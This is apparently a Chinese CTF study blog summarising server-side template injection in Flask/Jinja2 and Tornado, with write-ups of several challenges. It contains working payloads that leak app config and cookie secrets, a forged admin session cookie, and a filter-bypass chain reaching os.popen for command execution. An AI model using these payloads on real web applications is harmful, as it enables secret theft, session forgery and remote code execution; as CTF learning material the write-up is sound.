ssti(服务器模板注入的总结及几道例题)

+++++SSTI：

在做题之前还是先补充下知识，了解下python flask框架以及ssti的漏洞原理

flask在b站可以找到视频

视频的话可以看这个星盟的直播了解ssti

https://www.bilibili.com/video/BV1zi4y1x7QM

文档类：

https://www.anquanke.com/post/id/188172

https://www.cnblogs.com/wangtanzhi/p/12238779.html

• [ TokyoWesterns CTF ]shrine

2020.7.21

参考 https://www.cnblogs.com/wangtanzhi/p/12238779.html

	import flask 
	import os 
    app = flask.Flask(__name__) 
    app.config['FLAG'] = os.environ.pop('FLAG') 
	@app.route('/') 
	def index(): 
	return open(__file__).read() 
	@app.route('/shrine/') 
	def shrine(shrine): 
	def safe_jinja(s): 
	s = s.replace('(', '').replace(')', '') 
	blacklist = ['config', 'self'] 
	return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s 
	return flask.render_template_string(safe_jinja(shrine)) 
	if __name__ == '__main__': 
	app.run(debug=True) 

这个题目直接给出了源码，flag被写入了配置文件中
app.config['FLAG'] = os.environ.pop('FLAG')

有一个黑名单过滤了config和self

参考了上边的文章get两种绕过新姿势

/shrine/{{url_for.globals[‘current_app’].config}}

/shrine/{{get_flashed_messages.globals[‘current_app’].config}}

• [护网杯]-easy_tornado

2020.7.22

参考文档： https://blog.csdn.net/weixin_44677409/article/details/94410580

https://blog.csdn.net/brainw/article/details/105811920?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-5.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-5.nonecase

https://blog.csdn.net/wyj_1216/article/details/83043627

进入题目可以看到三个文件

分别看一遍

flag.txt说明flag文件在fllllllllag中

render是python中的一个渲染函数，渲染变量到模板中，即可以通过传递不同的参数形成不同的页面。

render函数介绍

tornado模板self.render和模板变量传递

说明文件的filehash使用这种算法构成的

稍微改动下filename或者filehash出现error界面，结合题目easy_tornado

tornado是python中的一个web应用框架。（ Python Web 框架：Tornado）

发现确实存在ssti漏洞

filehash=md5(cookie_secret+md5(filename))

现在filename=/fllllllllllllag，只需要知道cookie_secret的既能访问flag。

尝试/error?msg={{datetime}}

在Tornado的前端页面模板中，datetime是指向python中datetime这个模块，Tornado提供了一些对象别名来快速访问对象，可以参考Tornado官方文档

通过查阅文档发现cookie_secret在Application对象settings属性中，还发现self.application.settings有一个别名

RequestHandler.settings

An alias for self.application.settings.

handler指向的处理当前这个页面的RequestHandler对象，

RequestHandler.settings指向self.application.settings，

因此handler.settings指向RequestHandler.application.settings。

构造payload获取cookie_secret

/error?msg={{handler.settings}}

得到cookie_secret可以进行下一步计算

import hashlib 
hash = hashlib.md5() 

filename='/fllllllllllllag' 
cookie_secret="06d1f7e3-d535-411d-98b4-6f81cf4c88fc" 
hash.update(filename.encode('utf-8')) 
s1=hash.hexdigest() 
hash = hashlib.md5() 
hash.update((cookie_secret+s1).encode('utf-8')) 
print(hash.hexdigest()) 

得到结果

成功得到flag

• [xmctf] web8-考核

2020.7.20

根据提示说我们的name为None，那么我们尝试输入name=123

发现有回显,猜测可能为模板注入

尝试输入name={{config}}得到信息 ‘SECRET_KEY’: ‘woshicaiji’

因为提示说只有admin可以得到flag，猜测考察的flask session伪造，根据SECRET_KEY解密得到{‘username’: b’guest’}，所以我们修改如下{‘username’: b’admin’}然后加密

得到

eyJ1c2VybmFtZSI6eyIgYiI6IllXUnRhVzQ9In19.XvGGnw.Spe0HIXgeXJKFPJHYotMk53DkYM修改session的值然后访问/flag即可得到flag

• 沙盒逃逸类[XTCTF]Web_python_template_injection

2020.7.22

打开题目就很明了，没有其他仅有一句话，没有robots.txt

在路径拼接处确实发现ssti

先看一波config，发现啥也没有，既然如此判断flag直接保存在某个文件中，于是使用沙盒逃逸的方法来寻找flag

功夫不负有心人，找到fl4g文件，如何构造，可以看下这篇文章

https://www.anquanke.com/post/id/188172#h3-5讲的很详细

成功得到flag

• 沙盒逃逸类[XTCTF]web11

2020.7.22

参考链接：

https://www.anquanke.com/post/id/188172#h3-10

https://jiang-niao.github.io/2020/04/02/SSTi%20%E5%85%A8%E8%A7%A3%E6%9E%90/#%E5%B8%B8%E8%A7%81%E7%BB%95%E8%BF%87

这个题是web8的升级版，加了waf，可以看到存在ssti

加了waf绕过了一些函数和字符

进行fuzzing，做了一个fuzz字典

可以用python或者bp跑一遍，bp简单一些

相应长度为511，说明被过滤，发现过滤了args和.(点)和_(下划线)

点和下划线的绕过可以使用request

如： 绕过点， {{""[request[“args”][“class”]][request[“args”][“mro”]][1]request[“args”][“subclasses”][286][request[“args”][“init”]][request[“args”][“globals”]][“os”]"popen"request[“args”][“read”]}} +web传参

web传参可以url直接传get参数也可以post传参

因为同时过滤了args，所以要吧args用values来替换

最终的payload

cmd位置用来填写bash命令

但是我们发现直接cat fl4g是无法读取flag的提示flag被过滤了，所以需要使用base64来的编码绕过